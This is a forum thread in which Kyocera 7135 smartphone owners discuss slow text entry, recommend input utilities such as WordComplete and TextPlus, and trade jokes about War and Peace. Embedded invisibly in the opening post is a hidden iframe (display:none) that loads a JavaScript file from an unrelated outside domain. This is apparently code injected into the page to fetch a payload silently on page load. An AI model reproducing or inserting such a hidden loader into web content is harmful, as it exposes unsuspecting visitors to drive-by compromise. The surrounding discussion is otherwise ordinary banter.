post from 7135, damn this is slow

In the time it took me to post this, i had enough time to take a dump and read 3/4ths of War and fn Peace.

Anybody know how to make this faster?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Well, I heard about this new stylus... it comes in a form factor that you're probably more accustomed to writing with... http://www.crayola.com/palm/accessories .

    j/k :p

I post to the boards all the time from my 7135. It's not as fast as typing on a keyboard... but it's not all that bad. WordComplete helps a lot... probably cuts the time in half. Also, you can have the on-screen keyboard up and use graffiti at the same time (I don't think that was possible on any of the other Kyo smartphones I've had before... pdQ and 6035).

Yep. A text entry program makes a lot of difference and so does the right browser. My favorite text entry program is Textplus but they all work about the same. I also use Pop! -- an old Rick Braum program (creator of DOC/Doc+/Aportis Doc and other stuff)

    I don't find posting from a 7135 very slow.

Try this link. Not sure if it's blue tooth compatible or not.

Why don't you get off your a$$ (or the toilet) and use google to search? You can even use your 'smartphone' if you want to stay on the toilet.

    Wordcomplete:
    http://www.palmgear.com/software/sho...fm?prodID=3770

    TextPlus:
    http://www.smartcell.com/id20.htm

It just goes to show you it doesn't matter how smart the smartphone is....

Oh, and PS badboy...I doubt you read 3/4s of 'War and Peace'. Last time I checked the last book you read was 'Green Eggs and Ham'.

    Don't worry...
I went to college with Badboy. He's a punk and completely deserves it.

You don't even want to know how we talk to each other when not on stupid internet forums. :p

Looked at WordComplete on PalmGear ($25) and read a reference to LookDA (Shareware) but it requires HackMaster. Is it safe to install HackMaster on the 7135? When people were reporting a bunch of RSD problems it seems like they were wondering if it was related to hacks that had been installed (if I recall correctly). The SmartCell link didn't work.

    Anyone using LookDA?

    Slorandy,
Use X-Master instead, it is much more stable and does everything that HackMaster can.

In all seriousness, though, this has been a tremendous resource. Im not down on Smartphonesource at all. I actually bought my 7135 yesterday...based soley on the fact that I know I have all the support I need for my phone right here. Thats saying quite a bit, as it was a $500 phone!

Definitely... I've had it on my 7135 since the day I got it, and not had any problems. I only use a couple hacks though

Haha. I had a feeling there was more to that than met the eye. My old college roommate and I razz on each other just like that. He's the punk, not me :angel

For those that missed it, here's the last paragraph:

"In the first case it was necessary to renounce the consciousness of an unreal immobility in space and to recognize a motion we did not feel; in the present case it is similarly necessary to renounce a freedom that does not exist, and to recognize a dependence of which we are not conscious."

I think Leo Tolstoy died shortly after writing the book, thus he never got to read such classics as "Green Eggs and Ham"
